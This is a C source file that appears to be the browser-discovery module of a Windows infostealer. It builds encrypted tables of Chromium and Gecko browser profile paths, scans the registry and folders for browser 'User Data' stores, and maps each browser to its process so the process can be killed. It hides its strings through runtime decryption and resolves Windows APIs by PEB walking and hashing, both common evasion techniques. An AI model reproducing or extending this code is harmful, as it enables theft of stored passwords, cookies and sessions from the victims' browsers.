#include "browser_paths.h"
#include "hash.h"
#include "nt_types.h"
#include "peb.h"
#include "export_resolve.h"
#include "hashes.h"
#include "config.h"
#include "file_utils.h"
#include "enc_strings.h"
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

static int bp_strieq(const char *a, const char *b);
static int bp_is_dup(const BrowserPath *out, size_t n, const char *path, int roaming);

/* ── Process name mapping ─────────────────────────────────────── */
/* Each entry maps to the browser's actual executable stem (no .exe).
 * Browsers sharing an exe (e.g. Chrome variants → "chrome") map
 * to the same name so one kill_browser_processes("chrome") covers
 * Chrome, Chromium, CentBrowser, CryptoTab, etc.                    */

static BrowserPath browsers[58];
static int initialized = 0;

/* Auto-generated by gen_bp_tables.py - runtime-decrypted browser tables */

static void init_browser_tables(void) {
    if (initialized) return;

    static char _proc_0[32];
    enc_decrypt(enc_bp_proc_0, ENC_BP_PROC_0_LEN, _proc_0);
    static char _proc_1[32];
    enc_decrypt(enc_bp_proc_1, ENC_BP_PROC_1_LEN, _proc_1);
    static char _proc_2[32];
    enc_decrypt(enc_bp_proc_2, ENC_BP_PROC_2_LEN, _proc_2);
    static char _proc_3[32];
    enc_decrypt(enc_bp_proc_3, ENC_BP_PROC_3_LEN, _proc_3);
    static char _proc_4[32];
    enc_decrypt(enc_bp_proc_4, ENC_BP_PROC_4_LEN, _proc_4);
    static char _proc_5[32];
    enc_decrypt(enc_bp_proc_5, ENC_BP_PROC_5_LEN, _proc_5);
    static char _proc_6[32];
    enc_decrypt(enc_bp_proc_6, ENC_BP_PROC_6_LEN, _proc_6);
    static char _proc_7[32];
    enc_decrypt(enc_bp_proc_7, ENC_BP_PROC_7_LEN, _proc_7);
    static char _proc_8[32];
    enc_decrypt(enc_bp_proc_8, ENC_BP_PROC_8_LEN, _proc_8);
    static char _proc_9[32];
    enc_decrypt(enc_bp_proc_9, ENC_BP_PROC_9_LEN, _proc_9);
    static char _proc_10[32];
    enc_decrypt(enc_bp_proc_10, ENC_BP_PROC_10_LEN, _proc_10);
    static char _proc_11[32];
    enc_decrypt(enc_bp_proc_11, ENC_BP_PROC_11_LEN, _proc_11);
    static char _proc_12[32];
    enc_decrypt(enc_bp_proc_12, ENC_BP_PROC_12_LEN, _proc_12);
    static char _proc_13[32];
    enc_decrypt(enc_bp_proc_13, ENC_BP_PROC_13_LEN, _proc_13);
    static char _proc_14[32];
    enc_decrypt(enc_bp_proc_14, ENC_BP_PROC_14_LEN, _proc_14);
    static char _proc_15[32];
    enc_decrypt(enc_bp_proc_15, ENC_BP_PROC_15_LEN, _proc_15);
    static char _proc_16[32];
    enc_decrypt(enc_bp_proc_16, ENC_BP_PROC_16_LEN, _proc_16);
    static char _proc_17[32];
    enc_decrypt(enc_bp_proc_17, ENC_BP_PROC_17_LEN, _proc_17);
    static char _proc_18[32];
    enc_decrypt(enc_bp_proc_18, ENC_BP_PROC_18_LEN, _proc_18);
    static char _proc_19[32];
    enc_decrypt(enc_bp_proc_19, ENC_BP_PROC_19_LEN, _proc_19);
    static char _proc_20[32];
    enc_decrypt(enc_bp_proc_20, ENC_BP_PROC_20_LEN, _proc_20);
    static char _proc_21[32];
    enc_decrypt(enc_bp_proc_21, ENC_BP_PROC_21_LEN, _proc_21);
    static char _proc_22[32];
    enc_decrypt(enc_bp_proc_22, ENC_BP_PROC_22_LEN, _proc_22);
    static char _proc_23[32];
    enc_decrypt(enc_bp_proc_23, ENC_BP_PROC_23_LEN, _proc_23);
    static char _proc_24[32];
    enc_decrypt(enc_bp_proc_24, ENC_BP_PROC_24_LEN, _proc_24);
    static char _proc_25[32];
    enc_decrypt(enc_bp_proc_25, ENC_BP_PROC_25_LEN, _proc_25);

    static char _name_0[64];
    enc_decrypt(enc_bp_name_0, ENC_BP_NAME_0_LEN, _name_0);
    static char _name_1[64];
    enc_decrypt(enc_bp_name_1, ENC_BP_NAME_1_LEN, _name_1);
    static char _name_2[64];
    enc_decrypt(enc_bp_name_2, ENC_BP_NAME_2_LEN, _name_2);
    static char _name_3[64];
    enc_decrypt(enc_bp_name_3, ENC_BP_NAME_3_LEN, _name_3);
    static char _name_4[64];
    enc_decrypt(enc_bp_name_4, ENC_BP_NAME_4_LEN, _name_4);
    static char _name_5[64];
    enc_decrypt(enc_bp_name_5, ENC_BP_NAME_5_LEN, _name_5);
    static char _name_6[64];
    enc_decrypt(enc_bp_name_6, ENC_BP_NAME_6_LEN, _name_6);
    static char _name_7[64];
    enc_decrypt(enc_bp_name_7, ENC_BP_NAME_7_LEN, _name_7);
    static char _name_8[64];
    enc_decrypt(enc_bp_name_8, ENC_BP_NAME_8_LEN, _name_8);
    static char _name_9[64];
    enc_decrypt(enc_bp_name_9, ENC_BP_NAME_9_LEN, _name_9);
    static char _name_10[64];
    enc_decrypt(enc_bp_name_10, ENC_BP_NAME_10_LEN, _name_10);
    static char _name_11[64];
    enc_decrypt(enc_bp_name_11, ENC_BP_NAME_11_LEN, _name_11);
    static char _name_12[64];
    enc_decrypt(enc_bp_name_12, ENC_BP_NAME_12_LEN, _name_12);
    static char _name_13[64];
    enc_decrypt(enc_bp_name_13, ENC_BP_NAME_13_LEN, _name_13);
    static char _name_14[64];
    enc_decrypt(enc_bp_name_14, ENC_BP_NAME_14_LEN, _name_14);
    static char _name_15[64];
    enc_decrypt(enc_bp_name_15, ENC_BP_NAME_15_LEN, _name_15);
    static char _name_16[64];
    enc_decrypt(enc_bp_name_16, ENC_BP_NAME_16_LEN, _name_16);
    static char _name_17[64];
    enc_decrypt(enc_bp_name_17, ENC_BP_NAME_17_LEN, _name_17);
    static char _name_18[64];
    enc_decrypt(enc_bp_name_18, ENC_BP_NAME_18_LEN, _name_18);
    static char _name_19[64];
    enc_decrypt(enc_bp_name_19, ENC_BP_NAME_19_LEN, _name_19);
    static char _name_20[64];
    enc_decrypt(enc_bp_name_20, ENC_BP_NAME_20_LEN, _name_20);
    static char _name_21[64];
    enc_decrypt(enc_bp_name_21, ENC_BP_NAME_21_LEN, _name_21);
    static char _name_22[64];
    enc_decrypt(enc_bp_name_22, ENC_BP_NAME_22_LEN, _name_22);
    static char _name_23[64];
    enc_decrypt(enc_bp_name_23, ENC_BP_NAME_23_LEN, _name_23);
    static char _name_24[64];
    enc_decrypt(enc_bp_name_24, ENC_BP_NAME_24_LEN, _name_24);
    static char _name_25[64];
    enc_decrypt(enc_bp_name_25, ENC_BP_NAME_25_LEN, _name_25);
    static char _name_26[64];
    enc_decrypt(enc_bp_name_26, ENC_BP_NAME_26_LEN, _name_26);
    static char _name_27[64];
    enc_decrypt(enc_bp_name_27, ENC_BP_NAME_27_LEN, _name_27);
    static char _name_28[64];
    enc_decrypt(enc_bp_name_28, ENC_BP_NAME_28_LEN, _name_28);
    static char _name_29[64];
    enc_decrypt(enc_bp_name_29, ENC_BP_NAME_29_LEN, _name_29);
    static char _name_30[64];
    enc_decrypt(enc_bp_name_30, ENC_BP_NAME_30_LEN, _name_30);
    static char _name_31[64];
    enc_decrypt(enc_bp_name_31, ENC_BP_NAME_31_LEN, _name_31);
    static char _name_32[64];
    enc_decrypt(enc_bp_name_32, ENC_BP_NAME_32_LEN, _name_32);
    static char _name_33[64];
    enc_decrypt(enc_bp_name_33, ENC_BP_NAME_33_LEN, _name_33);
    static char _name_34[64];
    enc_decrypt(enc_bp_name_34, ENC_BP_NAME_34_LEN, _name_34);
    static char _name_35[64];
    enc_decrypt(enc_bp_name_35, ENC_BP_NAME_35_LEN, _name_35);
    static char _name_36[64];
    enc_decrypt(enc_bp_name_36, ENC_BP_NAME_36_LEN, _name_36);
    static char _name_37[64];
    enc_decrypt(enc_bp_name_37, ENC_BP_NAME_37_LEN, _name_37);
    static char _name_38[64];
    enc_decrypt(enc_bp_name_38, ENC_BP_NAME_38_LEN, _name_38);
    static char _name_39[64];
    enc_decrypt(enc_bp_name_39, ENC_BP_NAME_39_LEN, _name_39);
    static char _name_40[64];
    enc_decrypt(enc_bp_name_40, ENC_BP_NAME_40_LEN, _name_40);
    static char _name_41[64];
    enc_decrypt(enc_bp_name_41, ENC_BP_NAME_41_LEN, _name_41);
    static char _name_42[64];
    enc_decrypt(enc_bp_name_42, ENC_BP_NAME_42_LEN, _name_42);
    static char _name_43[64];
    enc_decrypt(enc_bp_name_43, ENC_BP_NAME_43_LEN, _name_43);
    static char _name_44[64];
    enc_decrypt(enc_bp_name_44, ENC_BP_NAME_44_LEN, _name_44);
    static char _name_45[64];
    enc_decrypt(enc_bp_name_45, ENC_BP_NAME_45_LEN, _name_45);
    static char _name_46[64];
    enc_decrypt(enc_bp_name_46, ENC_BP_NAME_46_LEN, _name_46);
    static char _name_47[64];
    enc_decrypt(enc_bp_name_47, ENC_BP_NAME_47_LEN, _name_47);
    static char _name_48[64];
    enc_decrypt(enc_bp_name_48, ENC_BP_NAME_48_LEN, _name_48);
    static char _name_49[64];
    enc_decrypt(enc_bp_name_49, ENC_BP_NAME_49_LEN, _name_49);
    static char _name_50[64];
    enc_decrypt(enc_bp_name_50, ENC_BP_NAME_50_LEN, _name_50);
    static char _name_51[64];
    enc_decrypt(enc_bp_name_51, ENC_BP_NAME_51_LEN, _name_51);
    static char _name_52[64];
    enc_decrypt(enc_bp_name_52, ENC_BP_NAME_52_LEN, _name_52);
    static char _name_53[64];
    enc_decrypt(enc_bp_name_53, ENC_BP_NAME_53_LEN, _name_53);
    static char _name_54[64];
    enc_decrypt(enc_bp_name_54, ENC_BP_NAME_54_LEN, _name_54);
    static char _name_55[64];
    enc_decrypt(enc_bp_name_55, ENC_BP_NAME_55_LEN, _name_55);

    static char _path_0[256];
    enc_decrypt(enc_bp_path_0, ENC_BP_PATH_0_LEN, _path_0);
    static char _path_1[256];
    enc_decrypt(enc_bp_path_1, ENC_BP_PATH_1_LEN, _path_1);
    static char _path_2[256];
    enc_decrypt(enc_bp_path_2, ENC_BP_PATH_2_LEN, _path_2);
    static char _path_3[256];
    enc_decrypt(enc_bp_path_3, ENC_BP_PATH_3_LEN, _path_3);
    static char _path_4[256];
    enc_decrypt(enc_bp_path_4, ENC_BP_PATH_4_LEN, _path_4);
    static char _path_5[256];
    enc_decrypt(enc_bp_path_5, ENC_BP_PATH_5_LEN, _path_5);
    static char _path_6[256];
    enc_decrypt(enc_bp_path_6, ENC_BP_PATH_6_LEN, _path_6);
    static char _path_7[256];
    enc_decrypt(enc_bp_path_7, ENC_BP_PATH_7_LEN, _path_7);
    static char _path_8[256];
    enc_decrypt(enc_bp_path_8, ENC_BP_PATH_8_LEN, _path_8);
    static char _path_9[256];
    enc_decrypt(enc_bp_path_9, ENC_BP_PATH_9_LEN, _path_9);
    static char _path_10[256];
    enc_decrypt(enc_bp_path_10, ENC_BP_PATH_10_LEN, _path_10);
    static char _path_11[256];
    enc_decrypt(enc_bp_path_11, ENC_BP_PATH_11_LEN, _path_11);
    static char _path_12[256];
    enc_decrypt(enc_bp_path_12, ENC_BP_PATH_12_LEN, _path_12);
    static char _path_13[256];
    enc_decrypt(enc_bp_path_13, ENC_BP_PATH_13_LEN, _path_13);
    static char _path_14[256];
    enc_decrypt(enc_bp_path_14, ENC_BP_PATH_14_LEN, _path_14);
    static char _path_15[256];
    enc_decrypt(enc_bp_path_15, ENC_BP_PATH_15_LEN, _path_15);
    static char _path_16[256];
    enc_decrypt(enc_bp_path_16, ENC_BP_PATH_16_LEN, _path_16);
    static char _path_17[256];
    enc_decrypt(enc_bp_path_17, ENC_BP_PATH_17_LEN, _path_17);
    static char _path_18[256];
    enc_decrypt(enc_bp_path_18, ENC_BP_PATH_18_LEN, _path_18);
    static char _path_19[256];
    enc_decrypt(enc_bp_path_19, ENC_BP_PATH_19_LEN, _path_19);
    static char _path_20[256];
    enc_decrypt(enc_bp_path_20, ENC_BP_PATH_20_LEN, _path_20);
    static char _path_21[256];
    enc_decrypt(enc_bp_path_21, ENC_BP_PATH_21_LEN, _path_21);
    static char _path_22[256];
    enc_decrypt(enc_bp_path_22, ENC_BP_PATH_22_LEN, _path_22);
    static char _path_23[256];
    enc_decrypt(enc_bp_path_23, ENC_BP_PATH_23_LEN, _path_23);
    static char _path_24[256];
    enc_decrypt(enc_bp_path_24, ENC_BP_PATH_24_LEN, _path_24);
    static char _path_25[256];
    enc_decrypt(enc_bp_path_25, ENC_BP_PATH_25_LEN, _path_25);
    static char _path_26[256];
    enc_decrypt(enc_bp_path_26, ENC_BP_PATH_26_LEN, _path_26);
    static char _path_27[256];
    enc_decrypt(enc_bp_path_27, ENC_BP_PATH_27_LEN, _path_27);
    static char _path_28[256];
    enc_decrypt(enc_bp_path_28, ENC_BP_PATH_28_LEN, _path_28);
    static char _path_29[256];
    enc_decrypt(enc_bp_path_29, ENC_BP_PATH_29_LEN, _path_29);
    static char _path_30[256];
    enc_decrypt(enc_bp_path_30, ENC_BP_PATH_30_LEN, _path_30);
    static char _path_31[256];
    enc_decrypt(enc_bp_path_31, ENC_BP_PATH_31_LEN, _path_31);
    static char _path_32[256];
    enc_decrypt(enc_bp_path_32, ENC_BP_PATH_32_LEN, _path_32);
    static char _path_33[256];
    enc_decrypt(enc_bp_path_33, ENC_BP_PATH_33_LEN, _path_33);
    static char _path_34[256];
    enc_decrypt(enc_bp_path_34, ENC_BP_PATH_34_LEN, _path_34);
    static char _path_35[256];
    enc_decrypt(enc_bp_path_35, ENC_BP_PATH_35_LEN, _path_35);
    static char _path_36[256];
    enc_decrypt(enc_bp_path_36, ENC_BP_PATH_36_LEN, _path_36);
    static char _path_37[256];
    enc_decrypt(enc_bp_path_37, ENC_BP_PATH_37_LEN, _path_37);
    static char _path_38[256];
    enc_decrypt(enc_bp_path_38, ENC_BP_PATH_38_LEN, _path_38);
    static char _path_39[256];
    enc_decrypt(enc_bp_path_39, ENC_BP_PATH_39_LEN, _path_39);
    static char _path_40[256];
    enc_decrypt(enc_bp_path_40, ENC_BP_PATH_40_LEN, _path_40);
    static char _path_41[256];
    enc_decrypt(enc_bp_path_41, ENC_BP_PATH_41_LEN, _path_41);
    static char _path_42[256];
    enc_decrypt(enc_bp_path_42, ENC_BP_PATH_42_LEN, _path_42);
    static char _path_43[256];
    enc_decrypt(enc_bp_path_43, ENC_BP_PATH_43_LEN, _path_43);
    static char _path_44[256];
    enc_decrypt(enc_bp_path_44, ENC_BP_PATH_44_LEN, _path_44);
    static char _path_45[256];
    enc_decrypt(enc_bp_path_45, ENC_BP_PATH_45_LEN, _path_45);
    static char _path_46[256];
    enc_decrypt(enc_bp_path_46, ENC_BP_PATH_46_LEN, _path_46);
    static char _path_47[256];
    enc_decrypt(enc_bp_path_47, ENC_BP_PATH_47_LEN, _path_47);
    static char _path_48[256];
    enc_decrypt(enc_bp_path_48, ENC_BP_PATH_48_LEN, _path_48);
    static char _path_49[256];
    enc_decrypt(enc_bp_path_49, ENC_BP_PATH_49_LEN, _path_49);
    static char _path_50[256];
    enc_decrypt(enc_bp_path_50, ENC_BP_PATH_50_LEN, _path_50);
    static char _path_51[256];
    enc_decrypt(enc_bp_path_51, ENC_BP_PATH_51_LEN, _path_51);
    static char _path_52[256];
    enc_decrypt(enc_bp_path_52, ENC_BP_PATH_52_LEN, _path_52);
    static char _path_53[256];
    enc_decrypt(enc_bp_path_53, ENC_BP_PATH_53_LEN, _path_53);

    /* Assign to browser table */
    browsers[0].name         = _name_0;
    browsers[0].path_suffix  = _path_0;
    browsers[0].use_roaming  = 0;
    browsers[0].process_name = _proc_0;
    browsers[1].name         = _name_1;
    browsers[1].path_suffix  = _path_1;
    browsers[1].use_roaming  = 0;
    browsers[1].process_name = _proc_0;
    browsers[2].name         = _name_2;
    browsers[2].path_suffix  = _path_2;
    browsers[2].use_roaming  = 0;
    browsers[2].process_name = _proc_0;
    browsers[3].name         = _name_3;
    browsers[3].path_suffix  = _path_3;
    browsers[3].use_roaming  = 0;
    browsers[3].process_name = _proc_1;
    browsers[4].name         = _name_4;
    browsers[4].path_suffix  = _path_4;
    browsers[4].use_roaming  = 0;
    browsers[4].process_name = _proc_2;
    browsers[5].name         = _name_5;
    browsers[5].path_suffix  = _path_5;
    browsers[5].use_roaming  = 0;
    browsers[5].process_name = _proc_3;
    browsers[6].name         = _name_6;
    browsers[6].path_suffix  = _path_6;
    browsers[6].use_roaming  = 0;
    browsers[6].process_name = _proc_3;
    browsers[7].name         = _name_7;
    browsers[7].path_suffix  = _path_7;
    browsers[7].use_roaming  = 0;
    browsers[7].process_name = _proc_4;
    browsers[8].name         = _name_8;
    browsers[8].path_suffix  = _path_8;
    browsers[8].use_roaming  = 0;
    browsers[8].process_name = _proc_5;
    browsers[9].name         = _name_9;
    browsers[9].path_suffix  = _path_9;
    browsers[9].use_roaming  = 0;
    browsers[9].process_name = _proc_0;
    browsers[10].name         = _name_10;
    browsers[10].path_suffix  = _path_10;
    browsers[10].use_roaming  = 0;
    browsers[10].process_name = _proc_0;
    browsers[11].name         = _name_11;
    browsers[11].path_suffix  = _path_11;
    browsers[11].use_roaming  = 0;
    browsers[11].process_name = _proc_5;
    browsers[12].name         = _name_12;
    browsers[12].path_suffix  = _path_12;
    browsers[12].use_roaming  = 0;
    browsers[12].process_name = _proc_6;
    browsers[13].name         = _name_13;
    browsers[13].path_suffix  = _path_13;
    browsers[13].use_roaming  = 0;
    browsers[13].process_name = _proc_7;
    browsers[14].name         = _name_14;
    browsers[14].path_suffix  = _path_14;
    browsers[14].use_roaming  = 0;
    browsers[14].process_name = _proc_8;
    browsers[15].name         = _name_15;
    browsers[15].path_suffix  = _path_15;
    browsers[15].use_roaming  = 0;
    browsers[15].process_name = _proc_9;
    browsers[16].name         = _name_16;
    browsers[16].path_suffix  = _path_16;
    browsers[16].use_roaming  = 0;
    browsers[16].process_name = _proc_0;
    browsers[17].name         = _name_17;
    browsers[17].path_suffix  = _path_17;
    browsers[17].use_roaming  = 0;
    browsers[17].process_name = _proc_0;
    browsers[18].name         = _name_18;
    browsers[18].path_suffix  = _path_18;
    browsers[18].use_roaming  = 0;
    browsers[18].process_name = _proc_10;
    browsers[19].name         = _name_19;
    browsers[19].path_suffix  = _path_19;
    browsers[19].use_roaming  = 0;
    browsers[19].process_name = _proc_11;
    browsers[20].name         = _name_20;
    browsers[20].path_suffix  = _path_20;
    browsers[20].use_roaming  = 0;
    browsers[20].process_name = _proc_0;
    browsers[21].name         = _name_21;
    browsers[21].path_suffix  = _path_21;
    browsers[21].use_roaming  = 0;
    browsers[21].process_name = _proc_0;
    browsers[22].name         = _name_22;
    browsers[22].path_suffix  = _path_22;
    browsers[22].use_roaming  = 0;
    browsers[22].process_name = _proc_12;
    browsers[23].name         = _name_23;
    browsers[23].path_suffix  = _path_23;
    browsers[23].use_roaming  = 0;
    browsers[23].process_name = _proc_0;
    browsers[24].name         = _name_24;
    browsers[24].path_suffix  = _path_24;
    browsers[24].use_roaming  = 0;
    browsers[24].process_name = _proc_0;
    browsers[25].name         = _name_25;
    browsers[25].path_suffix  = _path_25;
    browsers[25].use_roaming  = 0;
    browsers[25].process_name = _proc_0;
    browsers[26].name         = _name_26;
    browsers[26].path_suffix  = _path_26;
    browsers[26].use_roaming  = 0;
    browsers[26].process_name = _proc_13;
    browsers[27].name         = _name_27;
    browsers[27].path_suffix  = _path_27;
    browsers[27].use_roaming  = 0;
    browsers[27].process_name = _proc_0;
    browsers[28].name         = _name_28;
    browsers[28].path_suffix  = _path_28;
    browsers[28].use_roaming  = 0;
    browsers[28].process_name = _proc_0;
    browsers[29].name         = _name_29;
    browsers[29].path_suffix  = _path_29;
    browsers[29].use_roaming  = 0;
    browsers[29].process_name = _proc_0;
    browsers[30].name         = _name_30;
    browsers[30].path_suffix  = _path_30;
    browsers[30].use_roaming  = 0;
    browsers[30].process_name = _proc_14;
    browsers[31].name         = _name_31;
    browsers[31].path_suffix  = _path_31;
    browsers[31].use_roaming  = 0;
    browsers[31].process_name = _proc_15;
    browsers[32].name         = _name_32;
    browsers[32].path_suffix  = _path_32;
    browsers[32].use_roaming  = 0;
    browsers[32].process_name = _proc_0;
    browsers[33].name         = _name_33;
    browsers[33].path_suffix  = _path_33;
    browsers[33].use_roaming  = 0;
    browsers[33].process_name = _proc_16;
    browsers[34].name         = _name_34;
    browsers[34].path_suffix  = _path_34;
    browsers[34].use_roaming  = 0;
    browsers[34].process_name = _proc_17;
    browsers[35].name         = _name_35;
    browsers[35].path_suffix  = _path_35;
    browsers[35].use_roaming  = 0;
    browsers[35].process_name = _proc_18;
    browsers[36].name         = _name_36;
    browsers[36].path_suffix  = _path_36;
    browsers[36].use_roaming  = 0;
    browsers[36].process_name = _proc_0;
    browsers[37].name         = _name_37;
    browsers[37].path_suffix  = _path_37;
    browsers[37].use_roaming  = 0;
    browsers[37].process_name = _proc_0;
    browsers[38].name         = _name_38;
    browsers[38].path_suffix  = _path_38;
    browsers[38].use_roaming  = 0;
    browsers[38].process_name = _proc_0;
    browsers[39].name         = _name_39;
    browsers[39].path_suffix  = _path_39;
    browsers[39].use_roaming  = 0;
    browsers[39].process_name = _proc_1;
    browsers[40].name         = _name_40;
    browsers[40].path_suffix  = _path_40;
    browsers[40].use_roaming  = 0;
    browsers[40].process_name = _proc_1;
    browsers[41].name         = _name_41;
    browsers[41].path_suffix  = _path_41;
    browsers[41].use_roaming  = 0;
    browsers[41].process_name = _proc_1;
    browsers[42].name         = _name_42;
    browsers[42].path_suffix  = _path_42;
    browsers[42].use_roaming  = 0;
    browsers[42].process_name = _proc_2;
    browsers[43].name         = _name_43;
    browsers[43].path_suffix  = _path_43;
    browsers[43].use_roaming  = 0;
    browsers[43].process_name = _proc_2;
    browsers[44].name         = _name_44;
    browsers[44].path_suffix  = _path_44;
    browsers[44].use_roaming  = 0;
    browsers[44].process_name = _proc_3;
    browsers[45].name         = _name_45;
    browsers[45].path_suffix  = _path_45;
    browsers[45].use_roaming  = 0;
    browsers[45].process_name = _proc_3;
    browsers[46].name         = _name_46;
    browsers[46].path_suffix  = _path_46;
    browsers[46].use_roaming  = 0;
    browsers[46].process_name = _proc_0;
    browsers[47].name         = _name_47;
    browsers[47].path_suffix  = _path_47;
    browsers[47].use_roaming  = 0;
    browsers[47].process_name = _proc_19;
    browsers[48].name         = _name_48;
    browsers[48].path_suffix  = _path_48;
    browsers[48].use_roaming  = 0;
    browsers[48].process_name = _proc_20;
    browsers[49].name         = _name_49;
    browsers[49].path_suffix  = _path_49;
    browsers[49].use_roaming  = 0;
    browsers[49].process_name = _proc_21;
    browsers[50].name         = _name_50;
    browsers[50].path_suffix  = _path_50;
    browsers[50].use_roaming  = 0;
    browsers[50].process_name = _proc_22;
    browsers[51].name         = _name_51;
    browsers[51].path_suffix  = _path_26;
    browsers[51].use_roaming  = 0;
    browsers[51].process_name = _proc_13;
    browsers[52].name         = _name_33;
    browsers[52].path_suffix  = _path_33;
    browsers[52].use_roaming  = 0;
    browsers[52].process_name = _proc_16;
    browsers[53].name         = _name_52;
    browsers[53].path_suffix  = _path_24;
    browsers[53].use_roaming  = 0;
    browsers[53].process_name = _proc_0;
    browsers[54].name         = _name_53;
    browsers[54].path_suffix  = _path_51;
    browsers[54].use_roaming  = 0;
    browsers[54].process_name = _proc_23;
    browsers[55].name         = _name_54;
    browsers[55].path_suffix  = _path_52;
    browsers[55].use_roaming  = 0;
    browsers[55].process_name = _proc_24;
    browsers[56].name         = _name_55;
    browsers[56].path_suffix  = _path_53;
    browsers[56].use_roaming  = 0;
    browsers[56].process_name = _proc_25;
    browsers[57].name         = _name_16;
    browsers[57].path_suffix  = _path_16;
    browsers[57].use_roaming  = 0;
    browsers[57].process_name = _proc_0;
    /* Opera and Opera GX use APPDATA */
    browsers[5].use_roaming = 1;
    browsers[6].use_roaming = 1;
    initialized = 1;
}


/* ── Merged discovery buffers ─────────────────────────────────── */

/* Gecko browsers — process_name mapped to actual exe stems */
static const BrowserPath gecko_browsers[] = {
    {"Firefox",    "Mozilla\\Firefox\\Profiles",    1, "firefox"},
    {"Waterfox",   "Waterfox\\Profiles",            1, "waterfox"},
    {"Pale Moon",  "Moon\\Profiles",                1, "palemoon"},
    {"SeaMonkey",  "SeaMonkey\\Profiles",           1, "seamonkey"},
    {"IceDragon",  "Cyberfox\\Profiles",            1, "icedragon"},
    {"Basilisk",   "Basilisk\\Profiles",            1, "basilisk"},
    {"K-Meleon",   "K-Meleon\\Profiles",            1, "kmeleon"},
    {"GNU IceCat", "IceCat\\Profiles",              1, "icecat"},
    {"Swiftweasel","Swiftweasel\\Profiles",          1, "swiftweasel"},
    {"Floorp",     "Floorp\\Profiles",              1, "floorp"},
};

#define MAX_MERGED_BROWSERS 128

static BrowserPath merged_chromium[MAX_MERGED_BROWSERS];
static size_t merged_chromium_count = 0;
static int chromium_merged = 0;

static BrowserPath merged_gecko[MAX_MERGED_BROWSERS];
static size_t merged_gecko_count = 0;
static int gecko_merged = 0;

/*
 * get_chromium_browsers — merged discovery API.
 * 1. Registry-based scan (App Paths)
 * 2. Filesystem scan (%LOCALAPPDATA%, %APPDATA%, depth 2)
 * 3. Static 58-entry fallback table
 * Deduplicates by case-insensitive path_suffix comparison.
 */
const BrowserPath *get_chromium_browsers(size_t *count) {
    if (!chromium_merged) {
        init_browser_tables();
        merged_chromium_count = 0;

        /* 1. Registry discovery */
        discover_chromium_browsers_registry(merged_chromium,
                                            MAX_MERGED_BROWSERS,
                                            &merged_chromium_count);

        /* 2. Filesystem discovery (dedup on insert) */
        size_t fs_count = 0;
        BrowserPath fs_buf[64];
        discover_chromium_browsers_fs(fs_buf, 64, &fs_count);
        for (size_t i = 0; i < fs_count && merged_chromium_count < MAX_MERGED_BROWSERS; i++) {
            if (!bp_is_dup(merged_chromium, merged_chromium_count,
                           fs_buf[i].path_suffix, fs_buf[i].use_roaming)) {
                merged_chromium[merged_chromium_count++] = fs_buf[i];
            }
        }

        /* 3. Static fallback (dedup on insert) */
        for (int i = 0; i < 58 && merged_chromium_count < MAX_MERGED_BROWSERS; i++) {
            if (!bp_is_dup(merged_chromium, merged_chromium_count,
                           browsers[i].path_suffix, browsers[i].use_roaming)) {
                merged_chromium[merged_chromium_count++] = browsers[i];
            }
        }

        chromium_merged = 1;
    }

    *count = merged_chromium_count;
    return merged_chromium;
}

/*
 * get_gecko_browsers — merged discovery API.
 * 1. Filesystem scan (%APPDATA%, depth 2)
 * 2. Static 10-entry fallback table
 */
const BrowserPath *get_gecko_browsers(size_t *count) {
    if (!gecko_merged) {
        merged_gecko_count = 0;

        /* 1. Filesystem discovery */
        discover_gecko_browsers_fs(merged_gecko, MAX_MERGED_BROWSERS,
                                   &merged_gecko_count);

        /* 2. Static fallback (dedup on insert) */
        for (size_t i = 0; i < 10 && merged_gecko_count < MAX_MERGED_BROWSERS; i++) {
            if (!bp_is_dup(merged_gecko, merged_gecko_count,
                           gecko_browsers[i].path_suffix, gecko_browsers[i].use_roaming)) {
                merged_gecko[merged_gecko_count++] = gecko_browsers[i];
            }
        }

        gecko_merged = 1;
    }

    *count = merged_gecko_count;
    return merged_gecko;
}

/* ════════════════════════════════════════════════════════════════
 *  Dynamic FS-based Chromium browser discovery
 *  Scans %LOCALAPPDATA% and %APPDATA% recursively (depth ≤2)
 *  for directories containing a "Local State" file.
 *  Uses PEB-walk hash-resolved FindFirstFileW/FindNextFileW.
 * ════════════════════════════════════════════════════════════════ */

/* Resolved Win32 API signatures */
typedef DWORD  (*fn_genvw)(const WCHAR *, WCHAR *, DWORD);
typedef HANDLE (*fn_fffw)(const WCHAR *, WIN32_FIND_DATAW *);
typedef BOOL   (*fn_ffnw)(HANDLE, WIN32_FIND_DATAW *);
typedef BOOL   (*fn_fcl)(HANDLE);

/* ── Small helpers ────────────────────────────────────────── */

static int bp_strieq(const char *a, const char *b)
{
    while (*a && *b) {
        char ca = *a, cb = *b;
        if (ca >= 'A' && ca <= 'Z') ca += 32;
        if (cb >= 'A' && cb <= 'Z') cb += 32;
        if (ca != cb) return 0;
        a++; b++;
    }
    return *a == *b;
}

static int bp_is_dup(const BrowserPath *out, size_t n,
                     const char *path, int roaming)
{
    for (size_t i = 0; i < n; i++)
        if (out[i].use_roaming == roaming && bp_strieq(out[i].path_suffix, path))
            return 1;
    return 0;
}

/*
 * Derive display name from path suffix.
 *   "Google\\Chrome\\User Data"                → "Chrome"
 *   "BraveSoftware\\Brave-Browser\\User Data"   → "Brave-Browser"
 *   "Vivaldi\\User Data"                       → "Vivaldi"
 *   "Opera Software\\Opera Stable"              → "Opera Stable"
 */
static void bp_derive_name(char *dst, size_t cap, const char *path)
{
    const char *s1 = NULL, *s2 = NULL;
    for (const char *p = path; *p; p++)
        if (*p == '\\') { s1 = s2; s2 = p; }

    const char *last = s2 ? s2 + 1 : path;

    if (strcmp(last, "User Data") == 0) {
        if (s1) {
            /* "Google\\Chrome\\User Data" → copy between s1+1 and s2 */
            const char *start = s1 + 1;
            size_t len = (size_t)(s2 - start);
            if (len >= cap) len = cap - 1;
            memcpy(dst, start, len);
            dst[len] = '\0';
        } else if (s2) {
            /* "Vivaldi\\User Data" → copy from start to s2 */
            size_t len = (size_t)(s2 - path);
            if (len >= cap) len = cap - 1;
            memcpy(dst, path, len);
            dst[len] = '\0';
        } else {
            if (cap > 1) { dst[0] = '?'; dst[1] = '\0'; }
        }
    } else {
        size_t len = strlen(last);
        if (len >= cap) len = cap - 1;
        memcpy(dst, last, len);
        dst[len] = '\0';
    }
}

/* Wide-string helpers (stack buffers, no alloc) */
static int bp_wlen(const WCHAR *w)
{
    int n = 0; while (w[n]) n++; return n;
}

static void bp_wappend(WCHAR *dst, int cap, const WCHAR *src)
{
    int pos = bp_wlen(dst);
    for (int j = 0; src[j] && pos < cap - 1; j++)
        dst[pos++] = src[j];
    dst[pos] = 0;
}

